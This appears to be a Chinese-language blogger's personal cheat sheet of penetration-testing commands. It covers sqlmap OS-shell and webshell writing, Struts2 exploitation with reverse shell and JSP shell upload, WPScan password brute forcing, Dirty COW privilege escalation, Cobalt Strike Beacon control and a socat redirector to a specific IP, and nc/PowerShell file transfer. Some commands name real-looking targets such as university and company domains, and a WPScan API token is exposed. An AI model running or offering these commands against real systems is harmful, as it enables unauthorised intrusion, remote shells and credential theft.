渗透过程中用到很多小工具:有的时候指令参数感觉比较难记,去搜还比较费时间,所以想了一个小办法提高效率,把常用的参数本地记下来,时不时看一看,或者用的时候直接修改贴上去就行,如下:(本机环境python默认为python3,python2为python2)
sqlmap 常用指令: --identify-waf sqlmap安全狗试探 --technique B E U S T --random-agent --dbs --delay 2 -v 3 --risk 3 --batch –os-pwn 联动MSF反弹shell sqlmap -d "mssql://uset:password@ip:port/dbname" --os-shell 外连数据库操作命令 --os-shell 写入webshell或者命令shell 默认会有一个命令文件和上传文件 python sqlmap.py -u "hid=1" --file-dest="E://php///phpinfo.php写入目标路径" --file-write="E:/WWW//phpinfo.php本地shell路径" 写之前先看dba --privileges 绕过防护:--tamper WTS:and换成&& symboliclogical.py sublist3r 目录爆破 python2.7 python3.4 python2 sublist3r.py -b -v -d lzu.edu.cn -p 80,443 -t 50 -o lzu.txt OneForAll 子域名收集 py3.7 oneforall模块: python oneforall.py --target 1.txt --format=txt --brute=true run dirmap 单目标 python dirmap.py -i https://target.com -lcf python dirmap.py -i 192.168.1.1 -lcf 子网 python dirmap.py -i 192.168.1.0/24 -lcf python dirmap.py -i 192.168.1.1-192.168.1.100 -lcf 文件读取 python dirmap.py -iF targets.txt -lcf Arjun 请求参数fuzz工具:一般参数fuzz可以从JS中找到 py3 单个URL:python arjun.py -u https://api.example.com/endpoint --get 或者--post -t 22 多线程 -d 2延迟 多个URL:python arjun.py --urls targets.txt --get --include '{"api_key":"xxxxx"}'API密钥 对HTTP参数进行fuzz py>3.4 -t 20 设置线程 --headers 加请求头 python arjun.py -u https://api.example.com/endpoint --get/--post 不同请求 python arjun.py -u https://api.example.com/endpoint --get -d 2 延搁请求发送时间 python arjun.py -u https://api.example.com/endpoint --get --include 'api_key=xxxxx' 引入固定数据 nmap 常用命令: nmap -sS -iL sub_domain.txt -oX school.xml 批量扫描后输出 nmap -p 25 --script smtp-enum-users.nse 202.38.193.203 25端口 邮箱枚举 wpscan https://wpvulndb.com/users/edit --force | -f 不检查网站运行的是不是`WordPress` wpscan --url https://wp.tutorabc.com/ -e --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I #-e简单进行整体快速扫描 wpscan --url http://10.10.10.10 --enumerate vp --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I 简单扫描WP插件 wpscan --url https://intro.vipjr.com --enumerate ap --api-token DWrxuEc3Qad15aCEYq5yMqkwy1eZg5qbzdsMNwa105I 完整扫描WP插件 wpscan --url http://10.10.10.10 --enumerate u 枚举WP用户名 wpsan --url http://10.10.10.10 --enumerate vt 扫描所使用的主题和漏洞 wpscan -u https://www.xxxxxx.wiki/ -enumerate tt TimThumbs文件漏洞扫描 wpscan --url http://10.10.10.128/wordpress -P /root/Desktop/xray/rockyou.txt -U admin -t 100 #指定用户名为admin,密码为 /root/Desktop/xray/rockyou.txt 字典文件中的数据 设置线程100 xray xray.exe webscan --listen 127.0.0.1:1111 --html-output awvs.html 联动 xray.exe webscan --basic-crawler http://testphp.vulnweb.com/ --html-output xray-crawler.html 爬虫自动挖 Crawlergo targets.txt 里面的地址放http://testphp.vulnweb.com/这个格式 python launcher_new.py Struts2-Scan: py3 python Struts2Scan.py --info 查看信息 python Struts2Scan.py -u http://192.168.100.8:8080/index.action 单个检测 python Struts2Scan.py -f urls.txt 批量检测 python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --exec 指定漏洞 命令执行 python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --reverse 192.168.100.8:8888 反弹shell python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --webpath 获取web路径 python Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2-016 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp 上传shell WebCrack.py py3 后台爆破 不支持验证码 爆破结果:web_crack_ok.txt python WebCrack.py 输入文件名则进行批量爆破,输入URL则进行单域名爆破 Docker docker version docker info docker --help 镜像命令 docker images 查看所有镜像 docker search “tomcat” 或从http://hub.docker.com查 docker pull tomcat 下载镜像 docker rmi tomcat 删除镜像 容器命令 docker run -it --tomcat 运行 docker run -p 8080:8080 镜像名 端口映射执行 docker ps -a 列出正在运行的容器 docker ps -aq 列出正在运行的容器ID exit 容器停止并退出 docker start 容器ID 启动容器 docker restart 容器ID 重启容器 docker stop 容器ID 停止容器 docker stop $(docker ps -aq) 停止所有容器 docker attach 容器ID 直接进入容器启动命令的终端,不会启动新的进程 docker cp mycontainer:/opt/file.txt /opt/local/ 复制文件 docker-compose down 环境移除 docker image prune -f -a 删除所有暂时不使用的镜像 docker container prune -f 删除所有停止的镜像 docker-compose run --rm -p 8080:80 web docker容器端口映射 docker network prune 不被docker使用的network都将被清理掉 docker exec -ti name /bin/bash 进入docker容器查看 杀死占用端口命令: kill -9 $(lsof -i tcp:进程号 -t) sudo kill -s 9 $(lsof -i:端口号 -t) docker ps |awk '{print($1)}' |xargs -n 1 docker stop 脏牛提权:dirty.c 大于2.6.22版本(Linux bogon) 查看版本:uname -a 编译:gcc -pthread dirty.c -o dirty -lcrypt 执行: ./dirty 低权限用户名 kali搜索版本漏洞:searchsploit ubuntu 16 CS4.0 传输器 传输体 监听器(Beacon Foreign )Beacon是CS的Payload Beacon有两种通信模式。(异步通信模式/交互式通信模式) Beacon的类型(HTTP 和 HTTPS Beacon/DNS Beacon/SMB Beacon) 重定向器(目标靶机 <-------->多个并列的重定向器<------>CS服务器) socat TCP4-LISTEN:9999,fork TCP4:158.247.199.169:9999 socat转发流量到CS服务器 Beacon 命令 help 查看beacon shell所有内置命令帮助,如果想查看指定命令的用法,可以这样,eg: help checkin note 给当前目录机器起个名字, eg: note beacon-shell cd 在目标系统中切换目录,注意在win系统中切换目录要用双反斜杠,或者直接用'/' eg: cd c:\ mkdir 新建目录, eg: mkdir d:\beacon rm 删除文件或目录, eg: rm d:\beacon upload 上传文件到目标系统中 download 从目标系统下载指定文件,eg: download C:\Users\win7cn\Desktop\putty.exe cancel 取消下载任务,比如,一个文件如果特别大,下载可能会非常耗时,假如中途你不想继续下了,就可以用这个取消一下 shell 在目标系统中执行指定的cmd命令, eg: shell whoami getuid 查看当前beacon 会话在目标系统中的用户权限,可能需要bypassuac或者提权 pwd 查看当前在目录系统中的路径 ls 列出当前目录下的所有文件和目录 drives 列表出目标系统的所有分区[win中叫盘符] ps 查看目标系统当前的所有的进程列表 kill 杀掉指定进程, eg: kill 4653 sleep 10 指定被控端休眠时间,默认60秒一次回传,让被控端每10秒来下载一次任务,实际中频率不宜过快,容易被发现,80左右一次即可 jobs 列出所有的任务列表,有些任务执行时间可能稍微较长,此时就可以从任务列表中看到其所对应的具体任务id,针对性的清除 jobkill 如果发现任务不知是何原因长时间没有执行或者异常,可尝试用此命令直接结束该任务, eg: jobkill 1345 clear 清除beacon内部的任务队列 checkin 强制让被控端回连一次 exit 终止当前beacon 会话 ctrl + k 清屏 checkin 激活beacon 使其回连 help mode 查看传输模式 mode dns 传输模式-dns(每次传输4比特数据) mode dns-txt 切换传输模式-dns-txt(每次传输189比特数据) WeblogicScan python3 python WeblogicScan.py -u 127.0.0.1 -p 7001 单点 python WeblogicScan.py -f target.txt 批量 txt格式127.0.0.1:7001 或127.0.0.1 或127.0.0.1:700 命令行终端下载: wget -b http://www.sample-videos.com/video/mp4/big.mp4 隐藏下载 curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4 下载重命名 python: #!python #!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w') localFile.write(u.read()) localFile.close() Netcat cat file | nc -l 1234 攻击机将文件放到1234端口 nc host_ip 1234 > file 目标机连接该端口就会接收到 powershell: $p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file" "C:\%homepath%file") http://xl.bhcy.cn/addme.asp python atlas.py --url http://eci-2zedsrkf2aml8sk5i8w3.cloudeci1.ichunqiu.com/?id=%%1%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v Nginx 配置 sudo systemctl stop nginx systemctl start nginx systemctl restart nginx systemctl reload nginx 一些配置更改后,重新加载Nginx服务 systemctl disable nginx 禁止Nginx服务在服务器启动时启动 netstat -tulnp | grep ":53" 看端口是否被占用 netstat -ntlp 查看端口使用情况 service iptables status iptables -A INPUT -ptcp --dport 53 -j ACCEPT 开端口
持续更新,算个小分享和学习方法分享吧